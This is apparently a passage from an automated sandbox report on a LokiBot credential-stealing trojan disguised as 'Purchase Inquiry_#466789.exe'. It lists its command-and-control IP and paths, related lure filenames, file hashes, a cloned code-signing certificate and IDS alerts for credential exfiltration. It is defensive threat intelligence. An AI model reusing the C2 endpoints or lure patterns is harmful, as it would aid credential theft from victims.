                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://45.61.137.215/index.php/feed/100%Avira URL Cloudmalware
                  http://45.61.137.215/index.php/wp-json/100%Avira URL Cloudmalware
                  http://45.61.137.215/index.php/comments/feed/100%Avira URL Cloudmalware
                  http://45.61.137.215/index.php/t?id=090100%Avira URL Cloudmalware
                  http://45.61.137.215/index.php/feed/7%VirustotalBrowse
                  http://45.61.137.215/index.php/comments/feed/7%VirustotalBrowse
                  http://45.61.137.215/index.php/t?id=09019%VirustotalBrowse
                  http://45.61.137.215/index.php/wp-json/7%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: malware
                  		unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: malware
                  • URL Reputation: malware
                  		unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: malware
                  		unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: malware
                  • URL Reputation: malware
                  		unknown
                  http://45.61.137.215/index.php/t?id=090true
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.comPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersGPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://45.61.137.215/index.php/feed/Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.fontbureau.com/designers/?Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cn/bThePurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers?Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.ibsensoftware.com/Purchase Inquiry_#466789.exe, Purchase Inquiry_#466789.exe, 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.w.org/Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.tiro.comPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://gmpg.org/xfn/11Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.goodfont.co.krPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0Purchase Inquiry_#466789.exefalse
                  • URL Reputation: safe
                  		unknown
                  http://www.carterandcone.comlPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sajatypeworks.comPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.typography.netDPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/cabarga.htmlNPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cn/cThePurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.galapagosdesign.com/staff/dennis.htmPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cnPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/frere-user.htmlPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://45.61.137.215/index.php/wp-json/Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.jiyu-kobo.co.jp/Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.galapagosdesign.com/DPleasePurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers8Purchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fonts.comPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sandoll.co.krPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.urwpp.deDPleasePurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.zhongyicts.com.cnPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://45.61.137.215/index.php/comments/feed/Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.sakkal.comPurchase Inquiry_#466789.exe, 00000000.00000002.1676645014.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  45.61.137.215
                  		unknownUnited States
                  		40676AS40676UStrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1447828
                  Start date and time:2024-05-27 08:31:08 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 49s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Purchase Inquiry_#466789.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 53
                  • Number of non-executed functions: 12
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  02:31:56API Interceptor44x Sleep call for process: Purchase Inquiry_#466789.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  45.61.137.215FedEx_776282383902.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/t?id=090
                  hgDQGUqtEg.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/3b1tenbkyj
                  g1lrdXCX39.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/index?id=671120760852658
                  gunzipped.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/modify?post=1
                  FedEx Receipt_AWB# 102235506763.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/t?id=090
                  DHLAwb#82102199382.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/index?id=671120760852658
                  TBHD77628238942.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/6790
                  Dospecepotrazivanja_pdf.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/3b1tenbkyj
                  RFQ#678903403.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215/index.php/t?id=090

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AS40676USfile.exeGet hashmaliciousUnknownBrowse
                  • 41.216.183.25
                  file.exeGet hashmaliciousUnknownBrowse
                  • 41.216.183.25
                  fdftMGtnix.elfGet hashmaliciousUnknownBrowse
                  • 23.133.14.61
                  n4WgIM7VfS.elfGet hashmaliciousMiraiBrowse
                  • 162.73.212.211
                  file.exeGet hashmaliciousUnknownBrowse
                  • 41.216.183.25
                  file.exeGet hashmaliciousUnknownBrowse
                  • 41.216.183.25
                  file.exeGet hashmaliciousUnknownBrowse
                  • 104.225.208.26
                  FedEx_776282383902.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215
                  dn7MMSZM9O.elfGet hashmaliciousUnknownBrowse
                  • 206.201.59.139
                  hgDQGUqtEg.exeGet hashmaliciousLokibotBrowse
                  • 45.61.137.215

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Inquiry_#466789.exe.log

                  Download File
                  Process:C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.34331486778365
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                  C:\Users\user\AppData\Roaming\188E93\31437F.lck

                  Download File
                  Process:C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1

                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

                  Download File
                  Process:C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbq:4
                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:........................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.964456125425544
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  • Win32 Executable (generic) a (10002005/4) 49.97%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Purchase Inquiry_#466789.exe
                  File size:534'536 bytes
                  MD5:5eece0f9333721c96803f39becae9fa3
                  SHA1:4508905c92a34c55d3b9b9fa5700c6b640b9a200
                  SHA256:706a564a593479d9948fe8cfe542c4a788a80e3d08c38dc888179c5340023a08
                  SHA512:09922db0f9814db2398c2f468a56168e36d2b272aafd401dfc607ab78d3599552843cafab443bc6d64997d64fe51774b50adfe952a1938e70390df2d71602144
                  SSDEEP:12288:EOoSQi8LkpEauXFg5bb4P2mvtjB7NAtAHyDBWjUNoxsdlh62b7e7kR:7LvjE9XFxP2mVN7quHydWjUeWLOe
                  TLSH:7BB4228232ED599BD81E99F420F5485A47B1FA069C14E7DA3CFC838E51E7F584B043AB
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....HMf..............0.............Z.... ........@.. .......................@............@................................

                  File Icon

                  Icon Hash:c04e363636261032

                  Static PE Info

                  General

                  Entrypoint:0x47ff5a
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x664D48E7 [Wed May 22 01:22:47 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Authenticode Signature

                  Signature Valid:false
                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                  Signature Validation Error:The digital signature of the object did not verify
                  Error Number:-2146869232
                  Not Before, Not After
                  • 13/11/2018 00:00:00 08/11/2021 23:59:59
                  Subject Chain
                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                  Version:3
                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                  Serial:7C1118CBBADC95DA3752C46E47A27438

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add al, 00h
                  add eax, dword ptr [eax]
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax+0000000Eh], al
                  pushad
                  add byte ptr [eax], al
                  adc byte ptr [eax], 00000000h

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7ff080x4f.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000xdf0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x7f2000x3608
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x7df600x7e000d6df129deddc5e6de5499d05d900fc41False0.9638245597718254data7.973562930298665IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0x800000xdf00xe00a8f2fb670d4b4dc3288f87eb8491d7c9False0.7229352678571429data6.395316779163098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x820000xc0x2003006d5fc7a6bf0b33230bf0db546ea6aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x801000x7f0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9281496062992126
                  RT_GROUP_ICON0x809000x14data1.05
                  RT_VERSION0x809240x2ccdata0.42877094972067037
                  RT_MANIFEST0x80c000x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  05/27/24-08:32:00.314607TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973580192.168.2.445.61.137.215
                  05/27/24-08:32:03.034243TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.445.61.137.215
                  05/27/24-08:32:14.993058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.445.61.137.215
                  05/27/24-08:32:05.506034TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.445.61.137.215
                  05/27/24-08:32:10.321376TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.445.61.137.215
                  05/27/24-08:32:14.993058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.445.61.137.215
                  05/27/24-08:32:10.321376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.445.61.137.215
                  05/27/24-08:32:10.321376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.445.61.137.215
                  05/27/24-08:32:00.314607TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973580192.168.2.445.61.137.215
                  05/27/24-08:32:00.314607TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.445.61.137.215
                  05/27/24-08:32:07.737924TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.445.61.137.215
                  05/27/24-08:32:05.506034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.445.61.137.215
                  05/27/24-08:32:05.506034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.445.61.137.215
                  05/27/24-08:32:07.737924TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.445.61.137.215
                  05/27/24-08:32:14.993058TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.445.61.137.215
                  05/27/24-08:32:03.034243TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973780192.168.2.445.61.137.215
                  05/27/24-08:32:05.506034TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.445.61.137.215
                  05/27/24-08:32:07.737924TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.445.61.137.215
                  05/27/24-08:32:10.321376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.445.61.137.215
                  05/27/24-08:32:00.314607TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.445.61.137.215
                  05/27/24-08:32:03.034243TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973780192.168.2.445.61.137.215
                  05/27/24-08:32:03.034243TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.445.61.137.215
                  05/27/24-08:32:07.737924TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.445.61.137.215
                  05/27/24-08:32:14.993058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.445.61.137.215

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 27, 2024 08:32:00.307508945 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:00.312453032 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:00.312568903 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:00.314606905 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:00.319617033 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:00.319683075 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:00.324693918 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352104902 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352180958 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352236032 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352271080 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352305889 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352339029 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352364063 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:02.352364063 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:02.352375031 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352390051 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:02.352410078 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352446079 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352461100 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:02.352482080 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.352531910 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:02.357697964 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.357734919 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.357770920 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.357803106 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:02.357805967 CEST804973545.61.137.215192.168.2.4
                  May 27, 2024 08:32:02.357865095 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:02.359965086 CEST4973580192.168.2.445.61.137.215
                  May 27, 2024 08:32:03.024728060 CEST4973780192.168.2.445.61.137.215
